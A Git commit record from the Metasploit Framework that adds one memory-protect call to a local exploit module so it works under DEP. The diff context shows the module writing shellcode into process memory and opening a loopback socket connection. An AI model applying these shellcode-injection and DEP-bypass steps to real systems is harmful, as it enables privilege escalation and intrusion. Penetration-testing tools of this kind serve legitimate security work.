add call to memory protect to fix DEP environments

bug/bundler_fix
Spencer McIntyre 2012-10-01 18:49:18 -04:00
parent c93692b06d
commit 21e832ac1c
1 changed files with 1 additions and 0 deletions

View File

@ -244,6 +244,7 @@ class Metasploit3 < Msf::Exploit::Local
this_proc.memory.write(shellcode_address_dep, shellcode)
this_proc.memory.write(shellcode_address_nodep, shellcode)
this_proc.memory.protect(0x00020000)
addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("s!S!L!L!L!")
result = session.railgun.ws2_32.connect(socket, addr, addr.length)